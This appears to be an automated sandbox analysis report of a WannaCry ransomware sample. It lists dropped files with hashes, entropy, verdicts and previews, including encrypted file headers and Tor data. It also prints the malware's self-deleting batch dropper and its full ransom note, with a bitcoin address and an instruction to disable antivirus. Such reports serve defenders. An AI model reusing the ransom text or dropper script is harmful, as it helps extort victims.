                                Preview:WANACRY!....a....u...m..{d..(S-].... .qBa.....M.......<I...U.M.'+(..9...w.../'0......Hz(u...:...M.fi\.n....h...#....Q..v.:@.E\...n.3?.a....A.+,vU...*......A.D..w.8.)..|d...c.uO......3hZP.d[E.u.>w~.G4m.p7......wB.K1.m..!vh+.kw..J....2.[..r3[`8..|5......v.o..............R.Q.FJ.v.m*.?.}.l9..~..V..<.7gUc.Y..Y8F:RGQ.H#.`i..........G.]]Q=...SC.....n.. -....?.!.....?...43t. B..a.f..<[....c.n....]..<ol+.8...Y8..._.o.KjG]..U*.."..!..-.......6.wF.=$...,..?..`..+D....s.........}\...PxB.F$tj`.v..I......r*..A{n.z...C....9.)..L...c..B..u.p.......gF.......)y.W..Z...o....8.2A.Z...F.._$eb...t"!.l..t.....:8...X..%qcN...~....5.J..C.-$...}UQqi.Q.7.i?....!..D..e....Ay..5..f..Jm...V..`u...l.J/f"..#...NfqTQ...r{.j8-..A}..y..X#9....-Q.. ..@.%..4.1....p.-....fmC...X....>.f..wG.fnvL...lT...../.&..G..XW.2....dg...Y,A.G..zi.....0.P...b..'..bL.(.&1..|.....R6...4.l.f....P..s.{.h..[...L.uD ..Mi.F.......so....d.[g-#....M.Qw.J..]..4k1.6......;+g..;...D..1..<..4...3.+.J.!.
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):760
                                Entropy (8bit):7.743982442250135
                                Encrypted:false
                                SSDEEP:12:bkEeI3FUWOMnYaDzBe85pzSnXED43RtTjrrek/kx7k8ZslE2ObSIjd8cD5rRP9Fo:bksFUBMxh+XE+RtnGk/kx7pZMCjdJD5+
                                MD5:B7F081CC88CEBFA3E06479491DD1B5CD
                                SHA1:4263EE42534A40C08799B5B9F1A273E604A9068D
                                SHA-256:B23E07AAEA0BFB76AD68A11DBDEEF7C7BCBD6C844FA310771ABA8D2119765034
                                SHA-512:CD1AB6AB7110396E4AC0643A08D0727B603F240B1AEDB10EC3F62DA62C813DEF0FB91A429786B7E10CC90505F65FC948AE8838E6579DC85BB834CF78A86273A5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......RZ.;.....9H.K=.a...$...|;..Em............U..YO..-..Qq.....G<.,...`.(..d;..aE~>....S..\5..C?=.z.} .6&..q.....-;D1....0bs..2of,...Id?.f.:.<........|..>../e".:&..BJ.Vx....U.....<...P1.S2..x...?..'z....~...\M.Q)..D.$.^........&..9mja_._.N._Ij`....Q..............D..I.c..hv.-.....Ww...$...93..[.".39zH....O....6..yz.Y...%BKK]..Y..%..E..e./..@.!....dJ..c.r..p.......xr|..4.rk..A.a...+d.T.._...G..Mn0.l....`....jG!3..@.O.,.l ..._..k...{..s5...{....Us]i.B.d.....XY%w7.....?SnA....KA..t.(.a.$csW.......Vh.`.........}.pU....4j6..s.fur....`.A..'.bPI....].m.7S..+...gtb.m.....k...=..._}.e.....!.Z.w..(....=&............pl..b.V.p...T[u'...8].~...g.......X.......g..;.5.q0A.4...x..F.S% ..N!.,.H.G.*.$gY......7..........r......
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):295192
                                Entropy (8bit):7.999372656043149
                                Encrypted:true
                                SSDEEP:6144:+4/AQYodB7N6P3Nqz5Cbu8TUGJAB/cpCvOzK2nHk66Fp0y:1A3wC/kzwVTUeABYhnk66Fb
                                MD5:8676BAD163216BD03243BA57E3A6BCD0
                                SHA1:3BAE9977184CD163447BE8E81A371360445E437F
                                SHA-256:F94B9DCFC704B4D04B332785B6B8B4E874BCDC01C835193B1808FA0F7413BAB9
                                SHA-512:0BA390C02E35872384D9844327C105650059F2523EFE2CC7622EACD8EA5E3DD68C632F42DADAEA8593AF76EE4EED9CF99281EB67B9D85E076057C8168CB2D2B1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......k..X9....el..fF.y........7.~q..F...........qS...'..?.(..B...f..~X....... ORD.......T.@..p...........:.LM.....o..C.y.S..}..M..d.${K............,..h[%.(U....o.*.....l..V]s.....i.*sw../...F..X~.....P<...G....o.......)....7..N......V:.-...g..................V..m.....@..........p.....6[y.DN..q.o..Z.D....e....>....`.i5.J..Wx.-iG....y.....2dv...j.w.j........Z..=.)0.0%'.0em*....Qo...M..O@.6TL..Xj.:..x.R..L5..#H..... s<..k........b..Wx&k.....s..\...R...^gwG...v:..'.7;W={6.4a.4.q...B. N.;+.i1j.6.\B......f...".I.ZG}...`q..V.W.w...4.....!e.X^.%...b-.ox).Wd.;&M;.w=......9.F..1.'OFK^..h...G..bi...^@..n....}Q....!...-|r\.....!..:.!..T_..b...+..M.-./~...;$.........EI]%..p]..,KG.X)...V..Yy....Ho.P.)..dc+....9.Qxb.R...........k.J6...9.j.k._...f..#m...A.....P......v......)..3c....9..E.c.:.2.=.)..;..#....f...q....+a.81s4k.)#.i~4a|.H....IV^"A..._H....Mm......[.U.....z..y..t.*....8...y...Z.{6....V.v?`....x.'.4%.BX.0....wX...R.?.@..oh.m....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):792
                                Entropy (8bit):7.783218655260832
                                Encrypted:false
                                SSDEEP:12:bkEmP0nggDqBHNS98vIfkGMkzjNS4hQPar55pBgm6/ON0uWwSJ3p7Q3HWrUlgXWn:bkRsggD5YGMk1j1rPPoGNcJ3VCn
                                MD5:5D5FC625F651C390F8FDE465303D4030
                                SHA1:7B03367E8A90FBF07CCC085E31366E02CA3BE5AD
                                SHA-256:1540743BC554F779F6236D4F0FEF9718D8451424C9D928F21088840475B9C8B7
                                SHA-512:1138EB3C95C709BA04F9BCFC7DEEFA4CDF23B42119EFCF84060A3E541091D63C2D49C5E3A42E8B0BE09150CB72C8BCC36393B61629538F69F4A5D405B075B11E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....?........r..}.\.....S.5....A.X6.R.~...9.cN@.....=.?G..,....$..hf...7..N.!*.h.....A.&../.....u.g.y....t....M.....t.;O......Dsu.M..@.i...j...ar+..|.....%..7...j.c.).XK.DS.p-@..S^&..p..27..7_..YJ.]Q...............Y...k..[...........\)..1....C.N...............h$.....'J..j2`P(..u..`<q-{.S.... .P>(.g.}#.).$...g@...|...../....FY..-.H..py./..!N..6....IvOS.p..7.........z..9U.N.d...B..:...qP....".P....N..K.s.v...S>4.....C........f.<w....3-..A:....8...r.'R0.}..%..5w{~......J6..WXP.'........8....G.k.9....1..JS.`....B./{...3[..a.....l.../;.L..K......1.5:`.........e..`.:..?+I.....=:>E`I.u......-..h,p...r...4.c...~.B...T)}..u.&.X..^.i;x...\HV'P#..d2)k..*..{.0O...6.<....(.H.F...\{..rR=8.f..oLD...1.vH..tK...Gf....22D..K.g..t8[.{Z..n).bt.YB....R,+q..
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12216
                                Entropy (8bit):7.9846233948756895
                                Encrypted:false
                                SSDEEP:192:BdHZXezdMGLVHKFlMkbQB2l57Miy18g8RHcfgI3cAYnJq0i+AEDeUrhrntujMg8c:B90zmQylFl5mhfgI3cAYnJq0i+7eCtg3
                                MD5:8F57E3A903666AD3C8B590A5D3693C96
                                SHA1:74AAD5D0990BDE811C1490E03A14EA47AF10E1A9
                                SHA-256:DD3486D2F5E75E2F48BA02847794CC123AA76AC9D71069B77CC75BF18A771045
                                SHA-512:E196366CD6F821A9945DFA102F39972E97D2443216EF0F645DF0A6DD4CD72300F8BB9BCAB03E2A0C5BA0D9F4A1475ECAF771EAECCB401E6CA333DBC3E0576CF6
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......P:...by.......G..+,k.>.H...../..+FZ.....;.......E.....9....)..%.Q."|.....G#4. ....&..).Z._...x.v......../O.z}.;O}....%...#J.5.....+....W'.T%...i.v'....[..n...............?&...9o.F....,Lg.}.. ....j.............:......f.+..+#...p.pC..C.a..E.............).;8....s....f,I5.....y1..}...b..s..Qr.f.^..........[..v.c.......)...d....J......[.^o.......g...R.2|..LR'.4&aPT...6\..'d..zG..}-....T..+..s.e.....w..H.0Z.5^V#.....}..r.$.A...Ka.l.n.....2.. ?6?.....+.PU......9.7...R.Z...S~..<.r...^.]...KWA................?...3. .....03v....}F._....&.....xPiU.(FZ!....Y..p..5....Pv{.QH.L.....2<F..)....a......7._}....@.eT..u.*.\...k..~|8.:..+.....,l.D.Cm.pp.-Fi.v.+.h...D..h.r.~......e.g........q....LN.H..el......v.\.K.B..o._a.:.........lMmk.9...r...W.O....M...;.J,z.u(.4.x....+....kq._...A...:...'.M..l.w.p.,E</..;.$......1.y.1......K_;..a..AF&.yu.U...3&..x.5.61........Y.0.Hd:g..}r.G.mS...f......I...+..32.....A.I,h...Ckm.1...=<...R.......~...z7
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):18574
                                Entropy (8bit):6.051386964524659
                                Encrypted:false
                                SSDEEP:384:e/4DVEl1hn9h4VQV01h2p1Z/ea4igBVA1hrqEd24HVO1hchb50IU4mV91h5jMY4a:kyKDHLWSH2a9gBSyo2ak4hb+3jntHJLd
                                MD5:94A43CE53E36DC6B9B4CD0630E1B2ED7
                                SHA1:3E63294408CE8EB0D5C448BE6F0C46C8B4275AF6
                                SHA-256:74E161BD53C28548B24895D4F10D4C0781ED0209979E881A7D3F0840ABB2083D
                                SHA-512:07C3643C2E89D56434E20F321E51927E75D30AC86A9C3D59118E49E3B3B232BBAE158DD2029D084DDA914FA700C96F8F759FD43E6DD4FB505986F3EC798AAD47
                                Malicious:false
                                Reputation:unknown
                                Preview:dir-key-certificate-version 3..fingerprint 23D15D965BC35114467363C165C4F724B64B4F66..dir-key-published 2022-09-16 19:14:12..dir-key-expires 2023-09-16 19:14:12..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAlv6XS+VppPaQzOgor0YFlcXLWeXiMn5N3VBneXuw8maLOu9oPJ9z..2/oMQN8a+VOWTf+/jebGzOBK6MamXpgsIZPQWiT18gZMsYdR8mcqBYqVP3khwUWh..9QYkV+m+Auxa0TLzTrsi6dLDJ384XdpDweU+YJghMJNZ1NqiT8ogj84hxs5Tf+Qf..bn7EBIcU7SAKr5Lw25KrMb5e3AZSC5MilBS/KLgVTq/GiWb7pKd5pxGwlGolNX8a..PccZ2ZT2DrSQsct4wVxhSbUqANI3PfMpXvmUDxWWBgbQwLF02/4gi+13snlHtqwl..y1WjE55HVfx1CTX13SStwmF/N3SFtFf1qil3j5qrHdHtKlAYOaTfqab1eLVH1l83..LI5QWD7ri9GpPqIjlh6PuaHjaO2FW20SouZtS9jJKwi1l1G3ef1tSlha1cxkRxIp..U/ngvQBsoa9X26VfQA4MieZgVVdMVwjCNh2YC9aEXc/KxfcBueZkM1194qP88cVu..dOFYaftOkuGPAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAocBazlzJr02eAiuhp3Rs42ED+p0AlTm7ZwMJ40rqJCTKcyX6tghM..9H6+m7WP5AVJBvkdRHIVECwTJ+jAHCpq4/oYAptYEWO8jgvLLfRwp0wZ3hFQ02iy..Ou/Zk0pLezbL9Y06HwcDetdcZtr4
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with very long lines (950), with CRLF line terminators
                                Category:dropped
                                Size (bytes):2157020
                                Entropy (8bit):5.655511450541517
                                Encrypted:false
                                SSDEEP:12288:LqbPNRmEgT4z/ebWMu6LFgrAIdUUVUvnTymBxLIUtyygMH:LiAo2JTUGvTNrryyx
                                MD5:522791A01E600357F769EC5BDD9FEB25
                                SHA1:DF170AD6F98E10951D0C5CB37AC9A9CACFFD8FB7
                                SHA-256:E232D5F92D53E5A1F069CCA489C4C2CF6830115957F4331E39543632C79DAC0D
                                SHA-512:A0AE86A9712A1FD9663177B1877727152DD754D9F604D46D32298BA41E64D3808952761B662DDA728D097D91ABD8EE2E7AA8D685B5F0C6B7AE2CF21BD518261A
                                Malicious:false
                                Reputation:unknown
                                Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 32..valid-after 2023-01-31 15:00:00..fresh-until 2023-01-31 16:00:00..valid-until 2023-01-31 18:00:00..voting-delay 300 300..client-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..server-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.5.16,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):661
                                Entropy (8bit):5.187578283045712
                                Encrypted:false
                                SSDEEP:12:bwxXSdyXr87HVBvwN1+ylNgdydOR0IlFqNP84VgdKd/0V849fPRdr:bwRSMQ7HVB+BlNgEQuIlYP8agM6V86RV
                                MD5:1607E474FA94DE52AE631A9F121AE768
                                SHA1:0099DA780F5C663A3885FC9D347396C8982D9F3D
                                SHA-256:6644FA6A8523EB36D9B48FADDCC38B20E7AD7455AB6D06222459C3FDA3742F9F
                                SHA-512:CBCC110D5C54979E05F554BF86AA70361941F238194E2FDA9DEDA6EDEC12EBB7EF51536DABFB2B81D4B2A2C8941A036A999063C0B15E2F71B8651DF394B02341
                                Malicious:false
                                Reputation:unknown
                                Preview:# Tor state file last generated on 2023-01-31 16:20:41 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard whocares C56E98E934EDB5EEFA9322D5D4818E09325F7A80 DirCache..EntryGuardDownSince 2023-01-31 16:20:11 2023-01-31 16:20:12..EntryGuardAddedBy C56E98E934EDB5EEFA9322D5D4818E09325F7A80 0.2.9.10 2023-01-09 16:20:11..EntryGuard gesdm BF54EE3193751481579BA7CC7D8E1DF0A01AFB30 DirCache..EntryGuardDownSince 2023-01-31 16:20:19 2023-01-31 16:20:19..EntryGuardAddedBy BF54EE3193751481579BA7CC7D8E1DF0A01AFB30 0.2.9.10 2023-01-19 05:23:16..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2023-01-31 16:20:41..
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):661
                                Entropy (8bit):5.187578283045712
                                Encrypted:false
                                SSDEEP:12:bwxXSdyXr87HVBvwN1+ylNgdydOR0IlFqNP84VgdKd/0V849fPRdr:bwRSMQ7HVB+BlNgEQuIlYP8agM6V86RV
                                MD5:1607E474FA94DE52AE631A9F121AE768
                                SHA1:0099DA780F5C663A3885FC9D347396C8982D9F3D
                                SHA-256:6644FA6A8523EB36D9B48FADDCC38B20E7AD7455AB6D06222459C3FDA3742F9F
                                SHA-512:CBCC110D5C54979E05F554BF86AA70361941F238194E2FDA9DEDA6EDEC12EBB7EF51536DABFB2B81D4B2A2C8941A036A999063C0B15E2F71B8651DF394B02341
                                Malicious:false
                                Reputation:unknown
                                Preview:# Tor state file last generated on 2023-01-31 16:20:41 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard whocares C56E98E934EDB5EEFA9322D5D4818E09325F7A80 DirCache..EntryGuardDownSince 2023-01-31 16:20:11 2023-01-31 16:20:12..EntryGuardAddedBy C56E98E934EDB5EEFA9322D5D4818E09325F7A80 0.2.9.10 2023-01-09 16:20:11..EntryGuard gesdm BF54EE3193751481579BA7CC7D8E1DF0A01AFB30 DirCache..EntryGuardDownSince 2023-01-31 16:20:19 2023-01-31 16:20:19..EntryGuardAddedBy BF54EE3193751481579BA7CC7D8E1DF0A01AFB30 0.2.9.10 2023-01-19 05:23:16..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2023-01-31 16:20:41..
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:b.out separate standalone executable Large Data Huge Objects Enabled
                                Category:dropped
                                Size (bytes):276
                                Entropy (8bit):7.080113392342748
                                Encrypted:false
                                SSDEEP:6:mtNEVvlGoT9x41D2Ef6VgEMes2NodybVgggEavCBwjCaIfWDT:YEV0Sx4x2ECvlsIgBEavhjCaIfQ
                                MD5:CDC89A589122070C1072B440CC3B0517
                                SHA1:F073E3640BC97CD95D60904D7EAB3021E3AD1FB5
                                SHA-256:DAC641E98A016D017F82ECB094BD62B1E30D1430E02AE906493AE5F1D712EEAB
                                SHA-512:DBF48E7D6C4692452D7A476B3608C153C6ED195577485DD2784A5BE69558925FF264B7464D11DD60A224A27AF9F16D04BC85E590BA97A239A23D58AF56FBF24F
                                Malicious:true
                                Reputation:unknown
                                Preview:........RSA1........UW./..%`h......H.0.+.~*...@..]h~p..(...6XT.5.V. ..7...^.V.......!-...L.....l.}n_.W.fXJ.3E....;L$......X.../J.y..Mo..;l+E.......^..T.M..XJM..-9j.....2a..>(.%....!... ..J...N.V.Dg<./..d..5..<...Mm.H.....k,10...(9..p...k...8.............C.S.....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):136
                                Entropy (8bit):1.503202962632402
                                Encrypted:false
                                SSDEEP:3:wPM/Qylll+jbXsd/l:QM/QylllqXsd/l
                                MD5:920D0CD9F4F1ECBFF75C0A7AC1BD3ABE
                                SHA1:58FFEBC7E3CD000C9BEB976931144CC3D2512FC6
                                SHA-256:90B491A89DF10BB33582D86F5A6E77D6AF82EC9AAE71A8C781F9A15E31898EF3
                                SHA-512:3EC9C1704985D1356FBB54B7622EBA1477624767D37D6B3332273294A4891633BD17D48CD65F6E0421FBE8AFBD94A33DC3572567C2BF1358BE4CFEFBCE778D67
                                Malicious:false
                                Reputation:unknown
                                Preview:.MG............................................................................................>.c.................?.c.>.cz....K......
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:DOS batch file, ASCII text, with CRLF, CR line terminators
                                Category:dropped
                                Size (bytes):320
                                Entropy (8bit):5.087022538559631
                                Encrypted:false
                                SSDEEP:3:mKDDfewSiponv6xewImKFcsDONy+WlynJ96wYexi+XCrbPONy+WlynJfF06xiHYM:hqn4+B9TnRoJgpPnRoJ0F9a2T2ZLT2Ln
                                MD5:09AAE1ABF5568DD1F940137DD8DAF634
                                SHA1:857AFA678E47B47033502409FF9F1ED630B2DB72
                                SHA-256:0520935E7778057E45B297E4B934EE3CE3DB1051B67BE1DD9015BACB5B36CD15
                                SHA-512:6BFE594D04349B567375B027D8468D8059428E1BD03C80A0006522ECA998D34597ECD62A6462C2668A9C38C11A3B663C781DC385E6AF5F32A7E6152317E82453
                                Malicious:false
                                Yara Hits:
                                • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\140021675181576.bat, Author: Florian Roth
                                Reputation:unknown
                                Preview:@echo off...echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs...echo SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")>> m.vbs...echo om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe">> m.vbs...echo om.Save>> m.vbs...cscript.exe //nologo m.vbs...del m.vbs.....del /a %0..
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                Category:dropped
                                Size (bytes):1440054
                                Entropy (8bit):0.3363393123555661
                                Encrypted:false
                                SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                MD5:C17170262312F3BE7027BC2CA825BF0C
                                SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\cscript.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.82054758729429
                                Encrypted:false
                                SSDEEP:24:ba9CvlkQ7njPiKJaQb4ngoWMtue9QAEgQlu:OmkQ7njaKJz4Z9QOQlu
                                MD5:D524A0762BF0695AA8F16F780B49AD46
                                SHA1:FF98D8E165CDB60B3F399E38CFFEF2D3A160AF25
                                SHA-256:3E2B096488AE9B37BCC075DC7FF921ADC9F8C6EC740EAE450A823F7DEF0AE30F
                                SHA-512:F2FBA3664D1643AC7027364A9DF96FE55A998BB98EC2E23434CCFC7880BED111C684E52C9E99743626678DC75456A3311CFC0AB2FD1B480AF3474B921E8BD5C5
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.876037085497407
                                Encrypted:false
                                SSDEEP:24:bkQhPuqISjN6e+KLZvzbM16L2SMS2EXh5LBqi0SPU5XR9wQ4E1JDhwigOrGNUo1Z:bkQhPuqI6ke++ZvzA16PMKx+ipPUX/30
                                MD5:99E51748A95D56C6383CA76F7CE10098
                                SHA1:C710C152D24ED219DE30B1B6385614F6954822D2
                                SHA-256:B7B5440CD8F7A1EA8F5C28D606DCF07E58F53484CD9670D2FF565458A950435A
                                SHA-512:2210341D6048EF85D9DFB7913E0ADB7FC5AA8AA5B9B4C44745A6D6F47A2194CC8555D4890D488356C357C05046F23FBBB9F4659BB49BC051DB56933C370070F4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....X.D...n.d..M.{Bc...d...O...]o...h.qWRX..%E.w:....,..3r.|O8.:.!.33..bK..6f......+.-.e...............p..N..`X...*.%cM8..4HX...~.k....3'..7..0..VG........"...D.~...r...Te......p......Ut<..r.9...u.auG...6.!.~.'.c......Z...p.NT+.6..n[..z.2.e..8..............OY.\.$......}}h.....H.vw.TJ..~K_W....1.N_.....B...$.5A.T.t\X.....Eb,...Z8..V.;...+D..6..W.>...+.T2..AF?..f.....$.L.W...Ni...4..L...`........WZ.i.<.,B..v. ...^.6..y.c.^...&.R.{....`&.cpj.p....AE.......4..PF..%Y...$...o*:..T(.B..sKg..=...F....N...:.\.$.X.....i..oA.*.)\...F..j.H...C.........\8ce.-.M.b9.+./g..j...c..K.Z..>......~..-...N..m.....!.E.Au.@o..J..c...#!..C......3..s@H.4Cs\..^.u.T&...Q..i....4f.v..O`.r.%(...:..*@........ 9U...8...U..Y..{...vpR...~..MJf...]...Z.>....5..KC.Cy..%.<t..d.. ..Mv,.~.Me0.4......4c...1......u..0...L..dn..........H.<V...G.........,..i....Ke`7..f..V.6....\]....].x.....'K.Z#om?=I.....U.=b....R..J3).j...-.vI..IL...W'...$C.5.U..Zq...j..t..qB...a.u..9..
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.79464168243227
                                Encrypted:false
                                SSDEEP:24:cwoFHMpZblrHQw5bkdjNEjllbtaRLkRswbMQkvZ:EOZl5SdjNEMB
                                MD5:C34DE4FB2F6C2FB50A9854DD07018C79
                                SHA1:A61961E7AA025657559612B5C8E5DEA261DDC6C9
                                SHA-256:BE70FE8169CC6987116C491DB38453136511740DCC1BD460893FB70EEB4691C8
                                SHA-512:434C8337370392B9648CE2538A1788350D75C6D214383AAA74E9021D596908627EE2EABC5B575190158EDFBD874144590378F58F2EE79EB5957467FD55CD4E2A
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.844318657083868
                                Encrypted:false
                                SSDEEP:24:bkGs2m+LEwD3EzGoJ85/4JLmB0rKT5O+N76w8dQAijXpjotbuH4qqSVd:bkG10wrEyLpEm6KVO4cdQACXpjEbuH4Q
                                MD5:D7852C8A2F11118E54567B84B7D11E66
                                SHA1:03F87135F4F557773936FFEFB0B8E81FA5E4D886
                                SHA-256:A14114219E674DCC5AA06C0FD0F7F3E3874E1BAFA7BFF9DC0A9F27247B4A00C7
